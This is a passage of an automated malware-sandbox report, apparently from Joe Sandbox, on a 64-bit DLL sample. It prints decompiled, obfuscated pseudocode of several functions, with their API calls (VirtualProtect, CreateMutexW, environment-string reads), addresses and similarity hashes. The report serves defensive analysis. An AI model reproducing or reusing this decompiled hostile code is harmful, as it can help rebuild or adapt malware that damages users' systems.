				r14d = __rcx - 0x2103;
				r12d = __r8 + 0xd1;
				r15d =  *(_t238 + 0xd8);
				_t153 =  *(_t238 + 0xd0) + 0xfffff9ee;
				_t156 = __rdx + 0xeb4;
				r15d = r15d + 0x1249;
				r13d = __rdx - 0x27b2;
				r8d = r8d + 0x152;
				if (_t156 - _t258 + 0x329d < 0) goto 0x130f7f40;
				if (r14d == _t156) goto 0x130f7f24;
				if ( *((long long*)(__r9 + 0x2f8)) == 0) goto 0x130f7e1e;
				 *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x198)) =  *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x198)) +  *(__r9 + 0x90) - 0x3a59;
				_t235 =  *((intOrPtr*)(__r9 + 0x2f8));
				 *((long long*)(__r9 + 0x48)) = 0x84ef49a;
				r8d =  *( *((intOrPtr*)(__r9)) + 0x130);
				r8d = r8d ^ 0x000023f3; // executed
				if (VirtualProtect(_t260, _t258) != 0) goto 0x130f7d2b;
				if ( *((intOrPtr*)( *((intOrPtr*)(__r9)) + 0x188)) + 0x259 - 0x3595 < 0) goto 0x130f7d2b;
				 *(__r9 + 0x90) =  *(__r9 + 0x90) ^ __r9 + 0x000001c0;
				if ( *( *((intOrPtr*)(__r9 + 0x1c8)) + 0x60) * 0xc3622d03 - 0x30d5 <= 0) goto 0x130f7d6a;
				_t242 =  *(__r9 + 0x228) ^ 0x00001f2c;
				 *(__r9 + 0x120) = _t242;
				if (0x30d6 - _t235 < 0) goto 0x130f7d51;
				_t210 =  *((intOrPtr*)(__r9));
				_t248 = _t238 + 0xd0;
				 *((intOrPtr*)(_t210 + 0x198)) =  *((intOrPtr*)(_t210 + 0x198)) +  *((intOrPtr*)(__r9 + 0x70)) + 0x2032;
				 *((long long*)(_t235 + 8)) =  *((intOrPtr*)(__r9 + 0xc0));
				 *((intOrPtr*)(_t235 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x118)) + 0x50));
				 *((long long*)(__r9 + 0x28)) = __r9 + 0x1b0;
				r8d =  *( *((intOrPtr*)(__r9 + 0x118)) + 0x88 + _t210 * 8);
				 *_t235 = _t242 +  *((intOrPtr*)(__r9 + 0xc0));
				 *((long long*)(__r9 + 0xa0)) = 0x6dce;
				 *((intOrPtr*)(_t235 + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x118)) + 0xa4));
				 *( *((intOrPtr*)(__r9 + 0x140)) + 0x198) =  *( *((intOrPtr*)(__r9 + 0x140)) + 0x198) |  *(__r9 + 0x198) + 0x0000329d;
				r8d =  *(_t238 + 0xd0);
				VirtualProtect(_t256, _t254);
				if (_t153 - _t229 + 0x30d5 < 0) goto 0x130f803b;
				r14d = r14d + 0x30d5;
				 *((long long*)(__r9 + 0x158)) =  *((intOrPtr*)(__r9 + 0x88));
				 *((long long*)(__r9 + 0x298)) = _t235 +  *((intOrPtr*)(__r9 + 0xc0));
				 *((long long*)(__r9 + 0x10)) = 0x2598;
				 *(__r9 + 0x198) =  *(__r9 + 0x198) * 0xed7e2e8;
				_t230 =  *((intOrPtr*)(__r9 + 0x158));
				if (_t230 == 0) goto 0x130f7eac;
				_t192 =  *(__r9 + 0x1e0) | 0x0000228c;
				 *(__r9 + 0x198) = _t192;
				GetProcessHeap();
				if (_t192 == 0) goto 0x130f7eac;
				HeapFree(??, ??, ??); // executed
				r8d =  *(_t238 + 0xd8);
				 *((intOrPtr*)(_t238 + 0x50)) = _t254 + 0x81;
				r10d = _t256 + 0x2032;
				 *(_t238 + 0x48) = r10d;
				r11d = _t254 - 0x1563;
				 *((intOrPtr*)(_t238 + 0x40)) = r11d;
				_t150 = _t260 - 0x544;
				 *(_t238 + 0x38) = _t150;
				_t157 = _t258 - 0xb3d;
				_t154 = _t153 + 0x1c8;
				r9d = _t258 + 0x612;
				 *(_t238 + 0x30) = _t154;
				 *(_t238 + 0x28) = __r9;
				r8d = r8d + 0x216;
				 *(_t238 + 0x20) = _t157;
				E00007FFC7FFC130E82D0( *((intOrPtr*)(__r9 + 0x328)), _t230, _t230); // executed
				goto 0x130f803b;
				goto 0x130f803b;
				_t228 = r15d;
				_t251 = _t154;
				if (_t251 - (( *(_t248 + 0xd8) | _t228) ^ _t157) >= 0) goto 0x130f7ffe;
				if (_t251 -  *((intOrPtr*)(_t248 + 0x110)) +  *_t248 >= 0) goto 0x130f7fe6;
				SetEndOfFile(_t229);
				r9d =  *(__r9 + 0xc8);
				r10d =  *(__r9 + 0xf0);
				r9d = r9d & _t157;
				r10d = r10d ^  *(__r9 + 0x90);
				r9d = r9d ^ 0x00003666;
				 *(_t238 + 0x38) = r9d;
				r13d = r13d | _t154;
				 *(_t238 + 0x30) = _t150 & 0x000027b2;
				r10d = r10d - 0x3a59;
				 *(_t238 + 0x28) = _t154 & 0x00000008 | 0x000023f6;
				 *(_t238 + 0x20) = r10d;
				r8d = r13d;
				r14d = E00007FFC7FFC130E8BF0((_t154 & 0x000027b2) +  *(__r9 + 0x120),  *((intOrPtr*)(__r9 + 0x130)) + r14d,  *((intOrPtr*)(_t248 + 0x110)) +  *_t248, __r9, ( *(_t248 + 0xd8) | _t228) ^ _t157, _t228, _t230, __r9, _t252);
				goto 0x130f803b;
				 *(__r9 + 0x100) =  *(__r9 + 0x100) |  *((intOrPtr*)(__r9 + 0x188)) +  *((intOrPtr*)(__r9 + 0x78)) +  *((intOrPtr*)(__r9 + 0x70));
				goto 0x130f803b;
				_t250 =  *((intOrPtr*)(__r9 + 0x1f0));
				if (_t251 == r8d * _t250 - _t228) goto 0x130f803b;
				r8d = r8d * (_t230 + _t230);
				if (_t154 + 1 != r8d * _t250 - _t228) goto 0x130f8020;
				return _t258 - 0xfd2;
			}



























                                0x7ffc130f7c20
                                0x7ffc130f7c23
                                0x7ffc130f7c27
                                0x7ffc130f7c2b
                                0x7ffc130f7c38
                                0x7ffc130f7c43
                                0x7ffc130f7c51
                                0x7ffc130f7c58
                                0x7ffc130f7c6e
                                0x7ffc130f7c74
                                0x7ffc130f7c7a
                                0x7ffc130f7c87
                                0x7ffc130f7c8e
                                0x7ffc130f7c9a
                                0x7ffc130f7ca3
                                0x7ffc130f7cb1
                                0x7ffc130f7cc7
                                0x7ffc130f7cce
                                0x7ffc130f7cdb
                                0x7ffc130f7cee
                                0x7ffc130f7cf5
                                0x7ffc130f7d04
                                0x7ffc130f7d1b
                                0x7ffc130f7d24
                                0x7ffc130f7d41
                                0x7ffc130f7d4a
                                0x7ffc130f7d53
                                0x7ffc130f7d68
                                0x7ffc130f7d6a
                                0x7ffc130f7d6d
                                0x7ffc130f7d7f
                                0x7ffc130f7d8d
                                0x7ffc130f7da2
                                0x7ffc130f7da5
                                0x7ffc130f7dbd
                                0x7ffc130f7dcf
                                0x7ffc130f7dd3
                                0x7ffc130f7deb
                                0x7ffc130f7e02
                                0x7ffc130f7e09
                                0x7ffc130f7e18
                                0x7ffc130f7e26
                                0x7ffc130f7e33
                                0x7ffc130f7e4b
                                0x7ffc130f7e52
                                0x7ffc130f7e64
                                0x7ffc130f7e6c
                                0x7ffc130f7e73
                                0x7ffc130f7e7d
                                0x7ffc130f7e86
                                0x7ffc130f7e8c
                                0x7ffc130f7e93
                                0x7ffc130f7e9c
                                0x7ffc130f7ea6
                                0x7ffc130f7eac
                                0x7ffc130f7ebc
                                0x7ffc130f7ec0
                                0x7ffc130f7ec7
                                0x7ffc130f7ecc
                                0x7ffc130f7ed4
                                0x7ffc130f7ed9
                                0x7ffc130f7ee0
                                0x7ffc130f7ee4
                                0x7ffc130f7eeb
                                0x7ffc130f7ef1
                                0x7ffc130f7ef8
                                0x7ffc130f7f03
                                0x7ffc130f7f0f
                                0x7ffc130f7f16
                                0x7ffc130f7f1a
                                0x7ffc130f7f1f
                                0x7ffc130f7f3b
                                0x7ffc130f7f47
                                0x7ffc130f7f53
                                0x7ffc130f7f59
                                0x7ffc130f7f6c
                                0x7ffc130f7f6e
                                0x7ffc130f7f74
                                0x7ffc130f7f7d
                                0x7ffc130f7f84
                                0x7ffc130f7f87
                                0x7ffc130f7f8e
                                0x7ffc130f7f9d
                                0x7ffc130f7fbc
                                0x7ffc130f7fbf
                                0x7ffc130f7fc3
                                0x7ffc130f7fca
                                0x7ffc130f7fd1
                                0x7ffc130f7fd9
                                0x7ffc130f7fe1
                                0x7ffc130f7fe4
                                0x7ffc130f7ff5
                                0x7ffc130f7ffc
                                0x7ffc130f7ffe
                                0x7ffc130f8012
                                0x7ffc130f8025
                                0x7ffc130f8039
                                0x7ffc130f805f

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: ProtectVirtual$FileHeapPrivilegeProcessRelease
                                • String ID:
                                • API String ID: 1146652191-0
                                • Opcode ID: f8c4942e56d1cc675816b14a356dfaf46b24f5be3101768ff6fcfd4b9866806c
                                • Instruction ID: 9953ac6f7de0af428f2d765eb6b5b05fb97ad360630c624243fc19e29c606389
                                • Opcode Fuzzy Hash: f8c4942e56d1cc675816b14a356dfaf46b24f5be3101768ff6fcfd4b9866806c
                                • Instruction Fuzzy Hash: 65B18672605B998BDB90CF25D894BE937A8F788B98F054036CE4D5B358DF38D661CB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130FA4A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128memoryfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 58%
                                			E00007FFC7FFC130FA4A0(long long __rax, signed int __rcx, void* __rdx, void* __r9, intOrPtr _a16, intOrPtr _a80, intOrPtr _a88, intOrPtr _a96, intOrPtr _a104, intOrPtr _a120) {
				long long _v96;
				short _v104;
				void* __rbx;
				long long _t55;
				intOrPtr _t60;
				signed long long _t62;
				void* _t68;
				void* _t69;

				_t55 = __rax;
				r8d = r8d + 4;
				_a104 = _a104 + 0xfffffdb4;
				r9d = __rcx - 0x30d5;
				_a96 = r8d;
				_a16 = r9d;
				_a120 = _a80 + 0xffffda68;
				if (_a120 + 0x18b7 - __r9 + 0x38e9 > 0) goto 0x130fa608;
				if (__rdx - 0xea2 - _a96 + 0xffffee57 <= 0) goto 0x130fa5fa;
				_t60 = _a88;
				_v96 = 0x38e9;
				r9d = 0x3666;
				_v104 = 0x2598;
				r8d = 0x37e1;
				E00007FFC7FFC130E9AC0(_t60, __rcx, _t60, _t69); // executed
				 *((long long*)(_t60 + 0x348)) = _t55;
				_t62 = __rcx ^ 0x0000a532;
				 *(_t60 + 0x158) = _t62;
				if ( *( *((intOrPtr*)(_t60 + 0x1a0)) + 0xb0) * 0x4b917808 == 0x2598) goto 0x130fa5bc;
				 *(_t60 + 0x1b0) =  *(_t60 + 0x1b0) |  *( *((intOrPtr*)(_t60 + 0x1c0)) + 0x120) ^ 0x00002032;
				if (0x2599 != _t62) goto 0x130fa590;
				_v96 = 0x3189;
				r9d = 0x3666;
				_v104 = 0x30d5;
				r8d = 0x37e1;
				E00007FFC7FFC130E9AC0(_t60, _t62, _t60, _t69);
				 *((long long*)(_t60 + 0x350)) = 0x2599;
				 *((long long*)(_t60 + 0x120)) =  *((long long*)(_t60 + 0x120)) + 0xfffff73c;
				return _t68 + 0x2103;
			}











                                0x7ffc130fa4a0
                                0x7ffc130fa4af
                                0x7ffc130fa4c7
                                0x7ffc130fa4d8
                                0x7ffc130fa4df
                                0x7ffc130fa4ee
                                0x7ffc130fa4f6
                                0x7ffc130fa4ff
                                0x7ffc130fa513
                                0x7ffc130fa519
                                0x7ffc130fa529
                                0x7ffc130fa532
                                0x7ffc130fa538
                                0x7ffc130fa53d
                                0x7ffc130fa548
                                0x7ffc130fa54d
                                0x7ffc130fa55d
                                0x7ffc130fa564
                                0x7ffc130fa57f
                                0x7ffc130fa5a5
                                0x7ffc130fa5ba
                                0x7ffc130fa5c1
                                0x7ffc130fa5ca
                                0x7ffc130fa5d0
                                0x7ffc130fa5d5
                                0x7ffc130fa5e3
                                0x7ffc130fa5e8
                                0x7ffc130fa5ef
                                0x7ffc130fa607

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: CreateCriticalFileHeapLeaveLockSection
                                • String ID: 8
                                • API String ID: 4149557297-406019892
                                • Opcode ID: 77cb60f2d01c3103deb4358d7e7c9f8949588141885a850d418d3db0e2500b78
                                • Instruction ID: 5fe38b4b8d1eaab9386d1c2296811315ce8ec8f632313b3aa5417c44abe94267
                                • Opcode Fuzzy Hash: 77cb60f2d01c3103deb4358d7e7c9f8949588141885a850d418d3db0e2500b78
                                • Instruction Fuzzy Hash: 19616D736086D48BD362CF15E544BDEB7A8FB88794F154139EB8957798CB38D990CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E2A70 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 159memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 50%
                                			E00007FFC7FFC130E2A70(long long __rbx, void* __rcx, long long __rdx, void* __r8, void* __r10) {
				void* __r13;
				void* __r14;
				void* __r15;
				intOrPtr _t93;
				intOrPtr _t99;
				signed int _t105;
				void* _t110;
				signed long long _t136;
				intOrPtr _t149;
				long long _t150;
				void* _t154;
				void* _t155;
				void* _t158;
				signed long long _t159;
				void* _t160;
				void* _t163;
				void* _t165;
				void* _t166;
				void* _t168;
				long long _t170;
				void* _t171;

				r13d =  *(_t160 + 0x100);
				r10d = __r8 - 0x30d5;
				r12d =  *(_t160 + 0x108);
				r8d = __rcx - 0x1408;
				r13d = r13d + 0xffffda68;
				 *(_t160 + 0x100) = r10d;
				_t170 = __rdx;
				 *(_t160 + 0x108) = r8d;
				_t110 = __rcx + 0x61f;
				r9d = r9d + 0xffffeb0d;
				_t99 =  *((intOrPtr*)(_t160 + 0xf0)) + 0xffffd84e;
				 *((intOrPtr*)(_t160 + 0xd0)) = r9d;
				 *((intOrPtr*)(_t160 + 0xe8)) = _t99;
				r12d = r12d + 0xffffdc0a;
				r15d = r13d;
				if (_t99 - _t168 + 0x3189 >= 0) goto 0x130e2d94;
				if (_t99 - __r8 - 0x106 >= 0) goto 0x130e2d94;
				if (_t110 == _t154 - 0x3f3) goto 0x130e2d94;
				 *((long long*)(_t160 + 0xc8)) = __rbx;
				if (r12d - _t168 + 0x1f2c > 0) goto 0x130e2c16;
				_t149 =  *((intOrPtr*)(__rdx + 0x1c0));
				r9d = __r10 + 0x2598;
				_t136 =  *((intOrPtr*)(__rdx + 0x1e0));
				r10d = _t158 - 0x984;
				r11d = _t154 - 0x1956;
				r8d = _t166 + 0x2103;
				_t108 =  *(_t160 + 0x100) + 0x38e9;
				 *(__rdx + 0x68) =  *(_t149 + 0x188) * 0x5adf2c5c;
				 *(__rdx + 0xa0) = _t136 | 0x00002598;
				_t105 = _t168 + 0x27b2;
				 *((intOrPtr*)(_t160 + 0x60)) = _t154 - 0x12ab;
				 *(_t160 + 0x58) = r10d;
				 *((intOrPtr*)(_t160 + 0x50)) = r9d;
				 *((intOrPtr*)(_t160 + 0x48)) = r11d;
				 *((intOrPtr*)(_t160 + 0x40)) = _t155 + 0x4ca;
				 *((long long*)(__rdx + 0x1e0)) = _t136 -  *((intOrPtr*)(_t149 + 0x198)) - 0x3a59;
				 *(_t160 + 0x38) = _t105;
				 *(_t160 + 0x30) =  *(_t160 + 0x100) + 0x38e9;
				 *((long long*)(_t160 + 0x28)) = __rdx;
				 *((intOrPtr*)(_t160 + 0x20)) = _t110 + 0xffffeb3f;
				E00007FFC7FFC130FD5F0( *((intOrPtr*)(_t160 + 0xe0)) + 0x3f3, _t136 | 0x00002598, _t136 -  *((intOrPtr*)(_t149 + 0x198)) - 0x3a59, _t149, __r8, _t163, _t165, _t168, __rdx, _t171); // executed
				goto 0x130e2d8c;
				_t150 = r13d;
				_t159 = r12d;
				 *((long long*)(_t160 + 0x70)) = _t150;
				if (_t150 - _t159 *  *(__rdx + 0x198) < 0) goto 0x130e2c95;
				GetProcessHeap();
				if (r13d + 4 - _t159 *  *(__rdx + 0x198) >= 0) goto 0x130e2c43;
				r13d = r15d;
				r8d =  *(_t160 + 0x108);
				r9d =  *((intOrPtr*)(_t160 + 0xd0));
				if ( *((intOrPtr*)(__rdx + 0x78)) ==  *((intOrPtr*)(__rdx + 0x1b8)) +  *((intOrPtr*)(__rdx + 0x110)) -  *((intOrPtr*)(__rdx + 0xb0))) goto 0x130e2d8c;
				if ( *((intOrPtr*)(_t160 + 0x70)) - ( *(__rdx + 0x1f0) ^  *(__rdx + 0x100)) + r9d > 0) goto 0x130e2d8c;
				_t93 =  *((intOrPtr*)(__rdx + 0x78));
				if (_t93 - (_t154 + _t171 | _t105) > 0) goto 0x130e2d8c;
				asm("o16 nop [eax+eax]");
				 *(_t160 + 0x58) = 0x2743;
				 *((long long*)(_t160 + 0x50)) = 0x2de1;
				 *((long long*)(_t160 + 0x48)) = 0x19c7;
				r9d = 0x1ff4;
				 *((long long*)(_t160 + 0x40)) = 0x2e2f;
				r8d = 0x1c0c;
				 *(_t160 + 0x38) = 0x26f1;
				 *(_t160 + 0x30) = 0x1000;
				 *((long long*)(_t160 + 0x28)) = 0x1acd;
				 *((long long*)(_t160 + 0x20)) = 0x1f1c;
				 *0x13124160 = E00007FFC7FFC130FF8F0(_t93, _t108 & 0x00003189, _t93 - (_t154 + _t171 | _t105), ( *(__rdx + 0x1f0) ^  *(__rdx + 0x100)) + r9d,  *((intOrPtr*)(_t160 + 0x70)), _t108, _t163, _t165);
				r15d = r15d ^ r13d &  *(_t170 + 0x188);
				 *(_t170 + 0xb0) = r8d |  *(_t170 + 0xd8);
				if (_t93 + 3 - (_t154 + _t171 | _t105) <= 0) goto 0x130e2cf0;
				return _t171 + 0x1f2c;
			}
























                                0x7ffc130e2a83
                                0x7ffc130e2a8b
                                0x7ffc130e2aa0
                                0x7ffc130e2aa8
                                0x7ffc130e2aaf
                                0x7ffc130e2ab6
                                0x7ffc130e2abe
                                0x7ffc130e2ac1
                                0x7ffc130e2ad0
                                0x7ffc130e2ad6
                                0x7ffc130e2add
                                0x7ffc130e2aea
                                0x7ffc130e2af8
                                0x7ffc130e2aff
                                0x7ffc130e2b06
                                0x7ffc130e2b0b
                                0x7ffc130e2b1a
                                0x7ffc130e2b28
                                0x7ffc130e2b35
                                0x7ffc130e2b40
                                0x7ffc130e2b46
                                0x7ffc130e2b4d
                                0x7ffc130e2b54
                                0x7ffc130e2b5b
                                0x7ffc130e2b62
                                0x7ffc130e2b86
                                0x7ffc130e2b8e
                                0x7ffc130e2b94
                                0x7ffc130e2ba1
                                0x7ffc130e2bb5
                                0x7ffc130e2bca
                                0x7ffc130e2bd4
                                0x7ffc130e2bd9
                                0x7ffc130e2bde
                                0x7ffc130e2be3
                                0x7ffc130e2be7
                                0x7ffc130e2bf5
                                0x7ffc130e2bff
                                0x7ffc130e2c03
                                0x7ffc130e2c08
                                0x7ffc130e2c0c
                                0x7ffc130e2c11
                                0x7ffc130e2c16
                                0x7ffc130e2c1c
                                0x7ffc130e2c22
                                0x7ffc130e2c32
                                0x7ffc130e2c61
                                0x7ffc130e2c7b
                                0x7ffc130e2c82
                                0x7ffc130e2c85
                                0x7ffc130e2c8d
                                0x7ffc130e2cae
                                0x7ffc130e2ccb
                                0x7ffc130e2cd1
                                0x7ffc130e2cdd
                                0x7ffc130e2ce6
                                0x7ffc130e2cf0
                                0x7ffc130e2cfe
                                0x7ffc130e2d0c
                                0x7ffc130e2d15
                                0x7ffc130e2d1b
                                0x7ffc130e2d24
                                0x7ffc130e2d2a
                                0x7ffc130e2d33
                                0x7ffc130e2d3c
                                0x7ffc130e2d45
                                0x7ffc130e2d59
                                0x7ffc130e2d6a
                                0x7ffc130e2d77
                                0x7ffc130e2d86
                                0x7ffc130e2dad

                                APIs
                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFC130E906E), ref: 00007FFC130E2C61
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: HeapProcess
                                • String ID: /.$C'$-
                                • API String ID: 54951025-1702015707
                                • Opcode ID: 672deff062b64fbc16a2a7a10c4d6b86e45e16b49530db53f8233d17ed392130
                                • Instruction ID: ccf3e92e630272ccc681d54ddd9bba27e73fa56e96dc9c7f035c5c5169f8aead
                                • Opcode Fuzzy Hash: 672deff062b64fbc16a2a7a10c4d6b86e45e16b49530db53f8233d17ed392130
                                • Instruction Fuzzy Hash: 4A71BD72A08AD58AE720CB04E494BEEB3A8F78478CF110135DF8917B94DF78E595CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000201640CA7A0 Relevance: 6.1, APIs: 4, Instructions: 88memorysynchronizationCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 29%
                                			E00000201201640CA7A0(void* __edi, long long* __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, void* __r9, long long _a8, char _a16, char _a24) {
				intOrPtr _v56;
				void* _v64;
				intOrPtr _v72;
				long long _v88;
				void* __rsi;
				void* __rbp;
				long long* _t58;
				long long* _t59;
				long long _t60;
				long long _t75;
				intOrPtr* _t87;

				_t60 = __rbx;
				_t58 = __rax;
				_a8 = __rbx;
				_t76 =  *0x640cd458;
				_t87 = __rcx;
				_v72 = 0x18;
				_v56 = 0;
				E00000201201640C908C(0xe9f8f8df, __rax,  *((intOrPtr*)( *0x640cd458 + 0x20)));
				if (_t58 == __rbx) goto 0x640ca804;
				r9d = 0; // executed
				 *_t58(); // executed
				goto 0x640ca806;
				if (0 == 0) goto 0x640ca8d2;
				r9d = 0;
				_a16 =  *__rcx;
				_t59 =  &_a24;
				_v88 = _t59;
				E00000201201640C1000(__edi, _t59, __rbx,  &_a16,  *0x640cd458, 0x201640c0000,  *0x640cd448 + 0x201640d1178);
				if (_t59 == _t60) goto 0x640ca8d2;
				E00000201201640C908C(0x3ff22481, _t59,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t59 == _t60) goto 0x640ca875;
				CreateMutexW(??, ??, ??); // executed
				goto 0x640ca878;
				_t75 = _t60;
				if (_t75 == _t60) goto 0x640ca8c4;
				E00000201201640C908C(0xc06f8334, _t59,  *((intOrPtr*)( *0x640cd458 + 0x18)));
				if (_t59 == _t60) goto 0x640ca894;
				 *_t59();
				goto 0x640ca899;
				if (0x7f != 0xb7) goto 0x640ca8ba;
				E00000201201640C908C(0xa219a077, _t59,  *((intOrPtr*)(_t76 + 0x18)));
				if (_t59 == _t60) goto 0x640ca8c4;
				FindCloseChangeNotification(??); // executed
				goto 0x640ca8c4;
				 *((long long*)(_t87 + 0x18)) = _t75;
				HeapFree(??, ??, ??);
				return 1;
			}














                                0x201640ca7a0
                                0x201640ca7a0
                                0x201640ca7a0
                                0x201640ca7b0
                                0x201640ca7be
                                0x201640ca7c5
                                0x201640ca7cf
                                0x201640ca7dc
                                0x201640ca7eb
                                0x201640ca7fd
                                0x201640ca800
                                0x201640ca802
                                0x201640ca808
                                0x201640ca812
                                0x201640ca81d
                                0x201640ca824
                                0x201640ca838
                                0x201640ca83d
                                0x201640ca848
                                0x201640ca857
                                0x201640ca85f
                                0x201640ca86e
                                0x201640ca873
                                0x201640ca875
                                0x201640ca87b
                                0x201640ca886
                                0x201640ca88e
                                0x201640ca890
                                0x201640ca892
                                0x201640ca89e
                                0x201640ca8a9
                                0x201640ca8b1
                                0x201640ca8b6
                                0x201640ca8b8
                                0x201640ca8ba
                                0x201640ca8cc
                                0x201640ca8e7

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: DescriptorSecurity$ChangeCloseConvertCreateErrorFindFreeHeapLastMutexNotificationString
                                • String ID:
                                • API String ID: 2727274001-0
                                • Opcode ID: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                                • Instruction ID: d238e9a14ffb5ec44fcbca782597d3d153850d2da174be31d188614afd2eb962
                                • Opcode Fuzzy Hash: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                                • Instruction Fuzzy Hash: 1F31E4326043A5DBEB20DF51E8493DA63A4F788784F684421BF4D4378EDE39D4AACB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F0A40 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0A59
                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0ABB
                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0AF5
                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFC130ED8CF), ref: 00007FFC130F0B1F
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                • String ID:
                                • API String ID: 1557788787-0
                                • Opcode ID: 9283de5ed1eefac579436c803e6a5d98ddaba24538f63861c94d1b4398621570
                                • Instruction ID: 75863bbc0e5a97b7931cc7ec22bc21650c1f600872e9325186121a1c448551bc
                                • Opcode Fuzzy Hash: 9283de5ed1eefac579436c803e6a5d98ddaba24538f63861c94d1b4398621570
                                • Instruction Fuzzy Hash: A1213431F18BA982E620CF11A94002AA6E8BB58BECB184174DE4E73B94DF3CE461C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F9F80 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 248pipeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 35%
                                			E00007FFC7FFC130F9F80(intOrPtr __ecx, void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, void* __r11) {
				void* __rdi;
				void* __rbp;
				void* __r12;
				signed short _t143;
